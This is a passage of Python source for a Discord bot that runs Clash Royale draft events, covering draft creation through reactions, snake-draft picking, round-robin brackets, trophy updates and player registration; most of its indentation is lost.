await self.bot.say("You are not allowed to create drafts with a size smaller than 2.", delete_after=autodeletetime)
return
if "name=" in optionalarguments:
name = optionalarguments.partition("name=")[2].partition(",")[0]
optionalarguments = optionalarguments.replace(name, "")
else:
name = host.display_name+"'s Draft"
if "eligible=" in optionalarguments:
eligible = optionalarguments.partition("eligible=")[2].partition(",")[0]
optionalarguments = optionalarguments.replace(eligible, "")
eligiblerole = discord.utils.get(ctx.message.server.roles, name=eligible)
if eligiblerole == None:
await self.bot.say("Error, creating Draft failed. Invalid eligible statement(needs to be role name)", delete_after=autodeletetime)
return
else:
eligiblerole = ctx.message.server.default_role
if "tag" in optionalarguments:
tag = "True"
else:
tag = "False"
if eligiblerole == ctx.message.server.default_role:
drafterrole = discord.utils.get(ctx.message.server.roles, name="MM participant")
if tag == "False":
mention = ""
else:
mention = drafterrole.mention
else:
if tag == "False":
mention = ""
else:
mention = eligiblerole.mention
draftobj = Draft(size=size, eligible=eligiblerole.id, name=name, host=host.id)
print("## Draft '"+draftobj.name+"' has been created by "+host.display_name)
self.opendrafts.append(draftobj.id)
participants = []
self.men = True # If names are displayed as mentions
async def upPartis():
partinames = ""
if self.men == True:
for p in participants:
partinames = partinames +" "+ p.mention
else:
for p in participants:
partinames = partinames +" "+ p.display_name + ","
if partinames == "":
partinames = "-"
return partinames
emb = discord.Embed(title="New "+str(draftobj.size)+" man Draft '"+draftobj.name+"'", description="Draft is in creation", color=0x3498db)
emb.add_field(name="Host", value=host.mention)
emb.add_field(name="Draftname", value=draftobj.name)
emb.add_field(name="Size", value=str(size))
emb.add_field(name="DraftID", value=draftobj.id)
emb.add_field(name="Eligible", value=eligiblerole.name)
if "starttime=" in optionalarguments:
emb.add_field(name="Starting Time", value=optionalarguments.partition("starttime=")[2].partition(",")[0])
emb.add_field(name="Current Participants ("+str(len(participants))+")", value=await upPartis(), inline=False)
emb.set_footer(text="Use star to join the draft. Numbers to adjust draftsize. Octagonal sign to cancel creation. Notepad to toggle mentions.")
msg = await self.bot.say(mention, embed=emb)
await self.bot.pin_message(msg)
async for message in self.bot.logs_from(msg.channel, limit=5, after=msg):
            if message.type == discord.MessageType.pins_add:
await self.bot.delete_message(message)
async def toggleMentions():
if self.men == True:
self.men = False
emb.set_field_at(0, name="Host", value=host.display_name)
else:
self.men = True
emb.set_field_at(0, name="Host", value=host.mention)
emb.set_field_at(len(emb.fields)-1, name="Current Participants ("+str(len(participants))+")", value = await upPartis(), inline=False)
await self.bot.edit_message(msg, embed=emb)
buttons = ["⭐", "🔢", "🛑", "🗒"] # star, numpad, stop, notepad
for b in buttons:
await self.bot.add_reaction(msg, b)
async def handleReaction(react):
if react.user != self.bot.user:
if not react.reaction.emoji in buttons:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
else:
if Path("data/drafting/playerData/"+react.user.id+".p").is_file():
if react.reaction.emoji == "🛑":
if react.user == host or modRole in react.user.roles:
await self.bot.delete_message(msg)
self.opendrafts.remove(draftobj.id)
await self.bot.say(react.user.mention +" canceled the creation of the draft '"+draftobj.name+"'")
print("## Draft '"+draftobj.name+"' has been canceled")
return True
else:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
elif react.reaction.emoji == "🗒":
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
await toggleMentions()
elif react.reaction.emoji == "⭐":
if eligiblerole in react.user.roles:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
if react.user in participants:
participants.remove(react.user)
emb.set_field_at(len(emb.fields)-1, name="Current Participants ("+str(len(participants))+")", value = await upPartis(), inline=False)
await self.bot.edit_message(msg, embed=emb)
else:
participants.append(react.user)
emb.set_field_at(len(emb.fields)-1, name="Current Participants ("+str(len(participants))+")", value = await upPartis(), inline=False)
await self.bot.edit_message(msg, embed=emb)
else:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
elif react.reaction.emoji == "🔢":
if react.user != host:
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
else:
await self.bot.clear_reactions(msg)
emojis = ["◀"] # back emoji
for m in range(2,10):
emoji = str(m)+"\u20e3"
emojis.append(emoji)
for e in emojis:
await self.bot.add_reaction(msg, e)
numbers = {"1\u20e3":1, "2\u20e3":2, "3\u20e3":3, "4\u20e3":4, "5\u20e3":5, "6\u20e3":6, "7\u20e3":7, "8\u20e3":8, "9\u20e3":9}
while True:
n = await self.bot.wait_for_reaction(message=msg, timeout=15)
if n == None:
break
if n.user != self.bot.user:
if n.reaction.emoji in emojis:
if n.reaction.emoji == "◀": # back
break
num = numbers[n.reaction.emoji]
draftobj.size = num
break
else:
await self.bot.remove_reaction(msg, n.reaction.emoji, n.user)
emb.set_field_at(2, name="Size", value=str(draftobj.size))
emb.title = "New "+str(draftobj.size)+" man Draft '"+draftobj.name+"'"
await self.bot.edit_message(msg, embed=emb)
await self.bot.clear_reactions(msg)
for b in buttons:
await self.bot.add_reaction(msg, b)
else:
await self.bot.say(react.user.mention+", you are not registered yet. Please do so with **"+prefix[0]+"register** if you want to participate in Monthly Mayhem", delete_after=autodeletetime)
await self.bot.remove_reaction(msg, react.reaction.emoji, react.user)
while True:
r = await self.bot.wait_for_reaction(message=msg, timeout=10800)
if r == None:
await self.bot.delete_message(msg)
self.opendrafts.remove(draftobj.id)
await self.bot.say(draftobj.name +" timed out")
print("## "+draftobj.name +" timed out")
return
d = await handleReaction(r)
if d == True:
break
if r.user != self.bot.user:
if len(participants) == draftobj.size:
self.opendrafts.remove(draftobj.id)
await self.bot.clear_reactions(msg)
draftobj.status = "full"
fullPlayersMsg = "The draft '"+draftobj.name+"'("+draftobj.id+") is filled up! \nThe players are: "
for p in participants:
draftobj.players.append(p.id)
fullPlayersMsg = fullPlayersMsg + p.mention +", "
fullPlayersMsg = fullPlayersMsg + "\nThe host is: " + host.mention
fullPlayersMsg = fullPlayersMsg +"\nDo you want to start the draft?(Host only)"
fullPlayersMsg = await self.bot.say(fullPlayersMsg)
await self.bot.add_reaction(fullPlayersMsg, "❎")#no
await self.bot.add_reaction(fullPlayersMsg, "✅")#yes
while True:
react = await self.bot.wait_for_reaction(message=fullPlayersMsg)
if react.user != self.bot.user:
if react.user == host or modRole in react.user.roles or marshalRole in react.user.roles:
if react.reaction.emoji == "✅": # yes
await self.bot.delete_message(msg)
draftobj.status = "running"
await self.bot.clear_reactions(fullPlayersMsg)
await self.bot.edit_message(fullPlayersMsg, fullPlayersMsg.content+"\n*The draft has been started!*")
playerRole = await self.bot.create_role(ctx.message.server, name=draftobj.name, hoist=False, permissions=discord.Permissions.none(), mentionable=True)
draftobj.playerRole = playerRole.id
for p in draftobj.players:
plr = ctx.message.server.get_member(p)
if plr == None:
await self.bot.say("Player with the ID '"+p+"' is no longer on this server!")
return
roles = plr.roles
roles.append(playerRole)
await self.bot.replace_roles(plr, *roles)
everyonePerms = discord.PermissionOverwrite(read_messages=False)
playerPerms = discord.PermissionOverwrite(read_messages=True)
channelname = re.sub("[^a-zA-Z0-9-_]", "", draftobj.name.replace(" ","_"))
channel = await self.bot.create_channel(ctx.message.server, channelname, (ctx.message.server.default_role, everyonePerms),(playerRole, playerPerms),(marshalRole, playerPerms),(modRole, playerPerms))
await self.bot.edit_channel(channel, topic=draftobj.id)
draftobj.channel = channel.id
await self.bot.say(host.mention+" started the draft '"+draftobj.name+"'("+draftobj.id+"). Happy drafting! \n"+playerRole.mention+" please use the specific textchannel "+channel.mention+" for setting the draft up(Use **!startdraft** there if you want to do an in-discord draft and **!createbracket** for a bracket) \nUse **'"+prefix[0]+"finishdraft <draftid> <draftpage>'** once you are finished or **'"+prefix[0]+"canceldraft <draftid>'** to cancel it.")
await self.bot.whisper("DraftID of your Draft '"+draftobj.name+"':")
await self.bot.whisper(draftobj.id)
with open("data/drafting/drafts/"+draftobj.id+".p", "wb") as f:
pickle.dump(draftobj, f)
print("## Draft '"+draftobj.name+"' is now running")
return True
elif react.reaction.emoji == "❎": # no
await self.bot.delete_message(fullPlayersMsg)
self.opendrafts.append(draftobj.id)
for b in buttons:
await self.bot.add_reaction(msg, b)
break
else:
await self.bot.remove_reaction(fullPlayersMsg, react.reaction.emoji, react.user)
else:
await self.bot.remove_reaction(fullPlayersMsg, react.reaction.emoji, react.user)
async def poolMsg(self, pool, title="", n=13):
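        # Render the card pool as custom emoji split across several messages (n emoji per line, two lines per message), presumably to stay within Discord's per-message limits.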
cn = 0
cm = 0
line = ""
msgs = []
for i in range(int(len(self.cards)/(n*2)) + (len(self.cards)%(n*2) > 0)):
msgs.append('\u2063')
title = "**"+title+"**\n"
for c in pool:
e = await getEmoji(self.bot, c["name"])
line = line + str(e)
cn += 1
cm += 1
if cn == n:
cn = 0
line = line + " \n"
if cm == n*2:
cm = 0
for i in range(len(msgs)):
if not len(msgs[i]) > 2:
if line != "":
msgs[i] = line
line = ""
for i in range(len(msgs)):
if not len(msgs[i]) > 2:
if line != "":
msgs[i] = line
break
msgs = [title]+msgs+['\u2063']
return msgs
async def getCard(self, name):
card = None
for c in self.cards:
if re.sub("[^a-zA-Z]", "", c["name"]) == name:
card = c
break
return card
@commands.command(pass_context=True)
async def startdraft(self, ctx, timer=30):
"""used for starting in-discord drafts
Do not mistake this with !createdraft
You can only run this in the respective channel of a draft(created by using !createdraft)
Pick cards by using the reactions.
The timer for each pick can be adjusted by adding a number in seconds. Standard is 30s. Minimum is 10
While the draft is running you will not be able to talk in the channel
"""
draftid = ctx.message.channel.topic
try:
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
except:
await self.bot.say("You can only use this command in a group channel", delete_after=autodeletetime)
return
channel = ctx.message.server.get_channel(draftobj.channel)
if ctx.message.channel != channel:
await self.bot.say("You can only use this command in the group channel", delete_after=autodeletetime)
return
if draftobj.status != "running":
await self.bot.say("This draft is not running", delete_after=autodeletetime)
return
if ctx.message.author.id != draftobj.host:
await self.bot.say("Only the host is able to start the draft", delete_after=autodeletetime)
return
perm = discord.PermissionOverwrite()
perm.read_messages = True
perm.send_messages = False
perm.add_reactions = False
playerRole = discord.utils.get(ctx.message.server.roles, id=draftobj.playerRole)
await self.bot.edit_channel_permissions(channel, playerRole, perm)
print("## Draft '"+draftobj.name+"' discord-draft has been started")
players = []
player_decks = {}
for p in draftobj.players:
plr = ctx.message.server.get_member(p)
if plr == None:
await self.bot.say("Player with the ID '"+p+"' is no longer on this server!")
return
players.append(plr)
player_decks[plr.id] = []
shuffle(players)
        if timer < 10:
            timer = 10
tips = ["Did you know you can use Ctrl+F to check if a card is already drafted?", "Use the reactions below to pick your cards!", "In the last ten seconds of a turn this message will turn yellow to alarm you!", "Did you know that there are only 22 units that can attack air?", "Spells are really valuable! But you can still win without any!", "You can't chat in here during the drafting process: Less distraction, more drafting!", "Green means GO! Red means NO!", "Autopicks won't pick legendaries!"]
emb = discord.Embed(title=draftobj.name, description="Each player picks one card after another in snakedraft format("+str(timer)+"s time)", color=discord.Colour.red())
emb.set_footer(text=tips[randint(0,len(tips)-1)])
emb.add_field(name="Status", value="initializing...", inline=False)
for p in players:
emb.add_field(name=p.display_name, value="\u2063", inline=False)
pool = self.cards[:]
drafted = []
d = await self.poolMsg(drafted, "Drafted cards:")
mainMsg = await self.bot.say(embed=emb)
dMsgs = []
for i in d:
m = await self.bot.say(i)
dMsgs.append(m)
emojis = []
for i in pool:
e = await getEmoji(self.bot, i["name"])
emojis.append(e)
m1 = await self.bot.say("\u2063**A B C D E**")
for e in emojis[:20]:
await self.bot.add_reaction(m1, e)
m1 = await self.bot.get_message(ctx.message.channel, m1.id)
m2 = await self.bot.say("\u2063**F G H I **")
for e in emojis[20:40]:
await self.bot.add_reaction(m2, e)
m2 = await self.bot.get_message(ctx.message.channel, m2.id)
m3 = await self.bot.say("\u2063**K L M N P R**")
for e in emojis[40:60]:
await self.bot.add_reaction(m3, e)
m3 = await self.bot.get_message(ctx.message.channel, m3.id)
m4 = await self.bot.say("\u2063**S T V W X Z**")
for e in emojis[60:]:
await self.bot.add_reaction(m4, e)
m4 = await self.bot.get_message(ctx.message.channel, m4.id)
#perm.add_reactions = True
playerRole = discord.utils.get(ctx.message.server.roles, id=draftobj.playerRole)
await self.bot.edit_channel_permissions(channel, playerRole, perm)
def check(reaction, user):
return reaction.message.channel == channel and reaction.emoji in emojis
for i in range(8):
_round = "("+str(i+1)+"/8)"
for j in range(draftobj.size):
if i%2 != 0:
j = draftobj.size-1-j
turn = players[j]
emb.color = discord.Colour.green()
emb.set_field_at(0, name="Status", value="**"+turn.display_name+"**'s turn to pick "+_round, inline=False)
await self.bot.edit_message(mainMsg, embed=emb)
r = await self.bot.wait_for_reaction(user=turn, check=check, timeout=timer-10)
if r == None:
emb.color = discord.Colour.gold()
await self.bot.edit_message(mainMsg, embed=emb)
r = await self.bot.wait_for_reaction(user=turn, check=check, timeout=10)
emb.set_field_at(0, name="Status", value="processing pick...", inline=False)
emb.color = discord.Colour.red()
await self.bot.edit_message(mainMsg, embed=emb)
if r == None:
card = pool[randint(0,len(pool)-1)]
while card["rarity"] == "Legendary":
card = pool[randint(0,len(pool)-1)]
emoji = await getEmoji(self.bot, card["name"])
for m in [m1,m2,m3,m4]:
msg = discord.utils.find(lambda n: n.emoji == emoji, m.reactions)
if msg != None:
msg = msg.message
r = discord.utils.get(msg.reactions, emoji=emoji)
break
else:
card = await self.getCard(r.reaction.emoji.name)
emoji = r.reaction.emoji
r = r.reaction
members = await self.bot.get_reaction_users(r)
for u in members:
await self.bot.remove_reaction(r.message, r.emoji, u)
pool.remove(card)
drafted.append(card)
d = await self.poolMsg(drafted, "Drafted cards:")
for m in range(len(dMsgs)):
await self.bot.edit_message(dMsgs[m], d[m])
player_decks[turn.id].append(card["id"])
emb.set_field_at(j+1, name=turn.display_name, value=emb.fields[j+1].value+str(emoji), inline=False)
await self.bot.edit_message(mainMsg, embed=emb)
emb.set_field_at(0, name="Status", value="over", inline=False)
emb.color = discord.Colour.default()
await self.bot.edit_message(mainMsg, embed=emb)
dic = emb.to_dict()
draftobj.decks = dic["fields"][1:]
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
await self.bot.delete_messages([m1,m2,m3,m4])
await self.bot.say("**DECK LINKS**")
for p in players:
            await self.bot.say(p.display_name + ": https://link.clashroyale.com/deck/en?deck={}".format(";".join([str(i) for i in player_decks[p.id]])))
perm = discord.PermissionOverwrite()
perm.read_messages = True
perm.send_messages = True
await self.bot.edit_channel_permissions(channel, playerRole, perm)
@commands.command(pass_context=True)
async def createbracket(self, ctx):
"""creates a round robin bracket for the draft
Can only be used by the host of the draft in the draftchannel!
The results of the bracket will be entered into the draftfile.
If you want the results to be processed and trophies adjusted you need a Marshal or mod to either finish your draft or use !processresults
"""
draftid = ctx.message.channel.topic
try:
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
except:
await self.bot.say("You can only use this command in a group channel", delete_after=autodeletetime)
return
channel = ctx.message.server.get_channel(draftobj.channel)
if ctx.message.channel != channel:
await self.bot.say("You can only use this command in the group channel", delete_after=autodeletetime)
return
if draftobj.status != "running":
await self.bot.say("This draft is not running", delete_after=autodeletetime)
return
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
marshalRole = discord.utils.get(ctx.message.server.roles, name="Marshal")
if ctx.message.author.id != draftobj.host and not modRole in ctx.message.author.roles and not marshalRole in ctx.message.author.roles:
await self.bot.say("Only the host is able to create the bracket", delete_after=autodeletetime)
return
draftobj.status = "bracket"
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
players = []
for p in draftobj.players:
plr = ctx.message.server.get_member(p)
if plr == None:
await self.bot.say("Player with the ID '"+p+"' is no longer on this server!")
return
players.append(plr)
'''players = [] # for testing on testserver
for m in ctx.message.server.members:
players.append(m)
draftobj.size = len(players)-1'''
if len(players) % 2:
UserName = collections.namedtuple("UserName", "display_name")
players.append(UserName(display_name="None"))
rotation = players[:]
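        # Round-robin schedule via the circle method: keep the first entry fixed and rotate the rest once per round.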
fixtures = []
for i in range(0, len(players)-1):
fixtures.append(rotation)
rotation = [rotation[0]] + [rotation[-1]] + rotation[1:-1]
bracket = []
for f in fixtures:
n = len(f)
bracket.append(list(zip(f[0:n//2],reversed(f[n//2:n]))))
results = {}
resEmb = discord.Embed(title="Results", description="Results of the individual players(W/L)", color=discord.Colour.teal())
resEmb.set_footer(text="Use the tick to finish the bracket once all results are entered. The octagonal cancels this bracket.")
for p in players:
if p.display_name != "None":
results[p.display_name] = [0,0]
resEmb.add_field(name=p.display_name, value="0/0", inline=False)
messages = []
for r in range(len(bracket)):
emb = discord.Embed(title="Round "+str(r+1), description="Use the notepad to enter the results of this round")
for m in range(len(bracket[r])):
p1 = bracket[r][m][0].display_name
p2 = bracket[r][m][1].display_name
emb.add_field(name="Match "+str(m+1) ,value="**"+p1+"**\n vs\n**"+p2+"**")
msg = await self.bot.say(embed=emb)
await self.bot.add_reaction(msg, "📝")
messages.append(msg.id)
res = await self.bot.say(embed=resEmb)
messages.append(res.id)
await self.bot.add_reaction(res, "🛑")
await self.bot.add_reaction(res, "☑")
print("## Created Bracket for '"+draftobj.name+"'("+draftobj.id+")")
def check(reaction, user):
if modRole in user.roles or marshalRole in user.roles or user.id == draftobj.host:
return reaction.message.id in messages and reaction.emoji in ["📝", "🛑", "☑", "✅"]
else:
return False
emojis = []
def checkEmoji(reaction, user):
return reaction.emoji in emojis and (modRole in user.roles or marshalRole in user.roles or user.id == draftobj.host)
host = ctx.message.server.get_member(draftobj.host)
numbers = {"1\u20e3":1, "2\u20e3":2, "3\u20e3":3, "4\u20e3":4, "5\u20e3":5, "6\u20e3":6, "7\u20e3":7, "8\u20e3":8, "9\u20e3":9}
complete = False
while True:
r = await self.bot.wait_for_reaction(check=check)
msg = r.reaction.message
if r.reaction.emoji == "🛑":
for m in messages:
msg = await self.bot.get_message(channel, m)
await self.bot.clear_reactions(msg)
resEmb.color = discord.Colour.red()
await self.bot.edit_message(res, embed=resEmb)
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
draftobj.status = "running"
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
await self.bot.say("The Bracket has been canceled")
print("## The bracket of "+draftobj.name+" has been canceled")
break
elif r.reaction.emoji == "☑":
await self.bot.remove_reaction(msg, "☑", r.user)
await self.bot.say("The bracket is not completed yet, please enter the missing results", delete_after=5)
elif r.reaction.emoji =="✅":
if complete == False:
await self.bot.remove_reaction(msg, "✅", r.user)
await self.bot.say("The bracket is not completed yet, please enter the missing results", delete_after=5)
else:
for m in messages:
msg = await self.bot.get_message(channel, m)
await self.bot.clear_reactions(msg)
resEmb.color = discord.Colour.green()
await self.bot.edit_message(res, embed=resEmb)
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
draftobj.results = results
draftobj.status = "running"
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
await self.bot.say("The Bracket has been completed")
print("## The bracket of "+draftobj.name+" has been finished")
break
elif r.reaction.emoji == "📝":
emb = discord.Embed(**msg.embeds[0])
_round = int(emb.title[-1])
for f in msg.embeds[0]["fields"]:
emb.add_field(name=f["name"], value=f["value"])
while True:
emb.description = "Use the respective number of a match to enter the result for it. Use the back button to finish editing"
emb.color = discord.Colour.blue()
await self.bot.edit_message(msg, embed=emb)
await self.bot.clear_reactions(msg)
emojis = ["◀"]
await self.bot.add_reaction(msg, "◀")
for m in range(len(emb.fields)):
emoji = str(m+1)+"\u20e3"
emojis.append(emoji)
await self.bot.add_reaction(msg, emoji)
s = await self.bot.wait_for_reaction(message=msg, check=checkEmoji)
if s.reaction.emoji == "◀":
break
else:
match = numbers[s.reaction.emoji]
while True:
emb.description = "Use the numbers to select the winner of *match "+str(match)+"*"
await self.bot.edit_message(msg, embed=emb)
emojis = ["◀", "1\u20e3", "2\u20e3"]
await self.bot.clear_reactions(msg)
await self.bot.add_reaction(msg, "◀")
await self.bot.add_reaction(msg, "1\u20e3")
await self.bot.add_reaction(msg, "2\u20e3")
t = await self.bot.wait_for_reaction(message=msg, check=checkEmoji)
if t.reaction.emoji == "◀":
break
else:
winner = numbers[t.reaction.emoji]
p1 = bracket[_round-1][match-1][0].display_name
p2 = bracket[_round-1][match-1][1].display_name
if "None" in [p1, p2]:
await self.bot.add_reaction(msg, "😂")
await self.bot.add_reaction(msg, "⛔")
await asyncio.sleep(0.5)
break
v = emb.fields[match-1].value.replace("*","")
if not v.startswith("("):
if winner == 1:
results[p1] = [results[p1][0]+1, results[p1][1]]
results[p2] = [results[p2][0], results[p2][1]+1]
pr1 = "*(W)"+p1+"*"
pr2 = "(L)"+p2
else:
results[p1] = [results[p1][0], results[p1][1]+1]
results[p2] = [results[p2][0]+1, results[p2][1]]
pr1 = "(L)"+p1
pr2 = "*(W)"+p2+"*"
else:
if winner == 1:
if not v.startswith("(W)"):
results[p1] = [results[p1][0]+1, results[p1][1]-1]
results[p2] = [results[p2][0]-1, results[p2][1]+1]
pr1 = "*(W)"+p1+"*"
pr2 = "(L)"+p2
else:
if not v.startswith("(L)"):
results[p1] = [results[p1][0]-1, results[p1][1]+1]
results[p2] = [results[p2][0]+1, results[p2][1]-1]
pr1 = "(L)"+p1
pr2 = "*(W)"+p2+"*"
emb.set_field_at(match-1, name="Match "+str(match) ,value="**"+pr1+"**\n vs\n**"+pr2+"**")
for f in range(len(resEmb.fields)):
if resEmb.fields[f].name == p1:
resEmb.set_field_at(f, name=p1, value=str(results[p1][0])+"/"+str(results[p1][1]), inline=False)
elif resEmb.fields[f].name == p2:
resEmb.set_field_at(f, name=p2, value=str(results[p2][0])+"/"+str(results[p2][1]), inline=False)
await self.bot.edit_message(res, embed=resEmb)
if complete == False:
c = 0
for key in results:
if results[key][0]+results[key][1] == draftobj.size-1:
c += 1
if c == draftobj.size:
complete = True
await self.bot.remove_reaction(res, "☑", self.bot.user)
await self.bot.add_reaction(res, "✅")
break
emb.color = discord.Colour.default()
emb.description = "Use the notepad to enter the results of this round"
await self.bot.edit_message(msg, embed=emb)
await self.bot.clear_reactions(s.reaction.message)
await self.bot.add_reaction(msg, "📝")
@commands.command(pass_context=True)
async def canceldraft(self, ctx, *, draftid=""):
"""cancels a running draft
        (this command is not used to cancel a draft that is still being created. Use the octagonal sign or the cross instead)
You need to either enter a valid ID of the draft that should get canceled or use this command in the drafts channel
"""
if draftid == "":
draftid = ctx.message.channel.topic
try:
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
except:
await self.bot.say("You need to either enter a valid ID of the draft that should get canceled or use this command in the drafts channel", delete_after=autodeletetime)
return
if draftobj.status == "finished":
await self.bot.say("This Draft is finished")
return
if draftobj.status == "canceled":
await self.bot.say("This Draft has already been canceled")
return
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
marshalRole = discord.utils.get(ctx.message.server.roles, name="Marshal")
if ctx.message.author.id == draftobj.host or modRole in ctx.message.author.roles or marshalRole in ctx.message.author.roles:
playerRole = discord.utils.get(ctx.message.server.roles, id=draftobj.playerRole)
await self.bot.delete_role(ctx.message.server, playerRole)
lobby = discord.utils.get(ctx.message.server.channels, name="monthly_mayhem")
await self.bot.send_message(lobby, ctx.message.author.mention +" canceled the draft '"+draftobj.name+"'("+draftid+")")
draftobj.status = "canceled"
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
print("## The draft '"+draftobj.name+"' has been canceled")
channel = ctx.message.server.get_channel(draftobj.channel)
await self.bot.delete_channel(channel)
else:
await self.bot.say("Only the host of the draft is allowed to cancel the draft", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def finishdraft(self, ctx, draftid="", draftpage=""):
"""finishes a running draft and processes the results
        (this command is not used for a draft that is still being created. Use the octagonal sign or the cross instead)
'draftid' (You need to enter the id of the running draft that is supposed to be finished.)
'draftpage' (Please enter the clashvariant.com link of your draft if you drafted there)
If you entered the results through the in-discord bracket system you need to be a Marshal or Mod for the results to be processed and trophies adjusted.
You need to either enter a valid ID of the draft that should get finished or use this command in the drafts channel
"""
if draftid == "":
draftid = ctx.message.channel.topic
try:
with open("data/drafting/drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
except:
await self.bot.say("You need to either enter a valid ID of the draft that should get finished or use this command in the drafts channel", delete_after=autodeletetime)
return
if draftobj.status == "finished":
await self.bot.say("This Draft is already finished")
return
if draftobj.status == "canceled":
await self.bot.say("This Draft has been canceled")
return
if draftobj.status == "bracket":
await self.bot.say("There is still a bracket running in this draft. Please complete or cancel it first")
return
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
marshalRole = discord.utils.get(ctx.message.server.roles, name="Marshal")
if ctx.message.author.id == draftobj.host or modRole in ctx.message.author.roles or marshalRole in ctx.message.author.roles:
playerRole = discord.utils.get(ctx.message.server.roles, id=draftobj.playerRole)
await self.bot.delete_role(ctx.message.server, playerRole)
draftobj.status = "finished"
draftobj.draftpage = draftpage
with open("data/drafting/drafts/"+draftid+".p", "wb") as f:
pickle.dump(draftobj, f)
for plr in draftobj.players:
try:
with open("data/drafting/playerData/"+plr+".p", "rb") as p:
plyr = pickle.load(p)
if draftobj.host == plr:
plyr.hosted += 1
usr = ctx.message.server.get_member(plr)
plyr.draft_amount += 1
roles = await updateDrafterRole(ctx.message.server, plyr)
await self.bot.replace_roles(usr, *roles)
plyr.drafts.append(draftobj.id)
if modRole in ctx.message.author.roles or marshalRole in ctx.message.author.roles:
WL = draftobj.results[usr.display_name]
if plyr.trophies + int(WL[0])-int(WL[1]) >= 0:
plyr.trophies += int(WL[0])-int(WL[1])
else:
plyr.trophies = 0
plyr.setArena()
await manageLeaderboard(ctx.message.server, plyr)
with open("data/drafting/playerData/"+plr+".p", "wb") as p:
pickle.dump(plyr, p)
except:
print("## Error in Finishdraft at "+plr)
with open("data/drafting/draftlist.p", "rb") as dl:
l = pickle.load(dl)
l.append([draftobj.name, draftobj.id, draftobj.date])
with open("data/drafting/draftlist.p", "wb") as dl:
pickle.dump(l, dl)
lobby = discord.utils.get(ctx.message.server.channels, name="monthly_mayhem")
await self.bot.send_message(lobby, ctx.message.author.mention +" finished the draft '"+draftobj.name+"'("+draftid+")")
print("## The draft '"+draftobj.name+"' has been finished")
channel = ctx.message.server.get_channel(draftobj.channel)
await self.bot.delete_channel(channel)
else:
await self.bot.say("Only the host of the draft is allowed to finish the draft", delete_after=autodeletetime)
@commands.command(pass_context=True, hidden=True)
async def seasonreset(self, ctx):
modRole = discord.utils.get(ctx.message.server.roles, name="Admin")
if not modRole in ctx.message.author.roles:
await self.bot.say("You are not allowed to use this command!", delete_after=autodeletetime)
return
await self.bot.say("Do you really want to iniate the seasonreset? Type 'yes'")
y = await self.bot.wait_for_message(timeout=11, author=ctx.message.author, content="yes")
if y == None:
await self.bot.say("Seasonreset failed")
return
await self.bot.add_reaction(y, "👍")
await self.bot.say("Iniated Seasonreset")
for file in os.listdir("data/drafting/playerData/"):
with open("data/drafting/playerData/"+file, "rb") as f:
plyr = pickle.load(f)
plyr.trophyreset()
plyr.setArena()
plyr.updateDraftAmount()
await manageLeaderboard(ctx.message.server, plyr)
roles = await updateDrafterRole(ctx.message.server, plyr)
user = ctx.message.server.get_member(plyr.id)
if user == None:
print("## "+plyr.name+" does no longer exists, deleting his file...")
os.remove("data/drafting/playerData/"+plyr.id+".p")
else:
await self.bot.replace_roles(user, *roles)
with open("data/drafting/playerData/"+file, "wb") as f:
pickle.dump(plyr, f)
await self.bot.say("Succesfully finished seasonreset")
print("## Succesfully finished seasonreset")
@commands.command(pass_context=True)
async def register(self, ctx):
"""registeres you in our database so you can use the draft system"""
plyr = Player(user=ctx.message.author)
if Path("data/drafting/playerData/"+ctx.message.author.id+".p").is_file() == False:
with open("data/drafting/playerData/"+ctx.message.author.id+".p", "wb") as f:
pickle.dump(plyr, f)
await self.bot.say("Succesfully registered "+ ctx.message.author.mention, delete_after=autodeletetime)
print("## "+ctx.message.author.name+" succesfully registered")
else:
await self.bot.say(ctx.message.author.mention+", you are already registered", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def unregister(self,ctx):
"""deletes your entry in our database and all data within"""
if Path("data/drafting/playerData/"+ctx.message.author.id+".p").is_file():
os.remove("data/drafting/playerData/"+ctx.message.author.id+".p")
await self.bot.say(ctx.message.author.mention+" successfully unregistered and deleted all data stored", delete_after=autodeletetime)
print("## "+ctx.message.author.name+" succesfully unregistered")
else:
await self.bot.say(ctx.message.author.mention+" you are not registered", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def draftprofile(self, ctx, playername=None):
"""shows the profile of the selected player(either use name or tag)
if no name is entered it will show your own profile
Drafttrophies can be gained through playing official drafts hosted by Marshals.
        Your gain/loss gets calculated from your wins minus losses (this can be negative, e.g. you lose trophies)
        Your arena depends on your trophies. Every 5 trophies you unlock a new one. You can also drop out of arenas!
Drafts are the total count of your completed drafts.
"""
if playername == None:
playername = ctx.message.author.display_name
if len(ctx.message.mentions) > 0:
playername = ctx.message.mentions[0].display_name
try:
player = discord.utils.get(ctx.message.server.members, display_name=playername)
except:
player = ""
if Path("data/drafting/playerData/"+player.id+".p").is_file():
with open("data/drafting/playerData/"+player.id+".p", "rb") as f:
plyr = pickle.load(f)
plyr.rank = await getRank(player)
emb = discord.Embed(title="Profile", description="Player: "+player.display_name, color=0x3498db)
emb.set_thumbnail(url=player.avatar_url)
emb.add_field(name="Drafttrophies", value=plyr.trophies)
emb.add_field(name="Legendtrophies", value=plyr.legendtrophies)
emb.add_field(name="Arena", value=plyr.arena)
emb.add_field(name="Rank", value=plyr.rank)
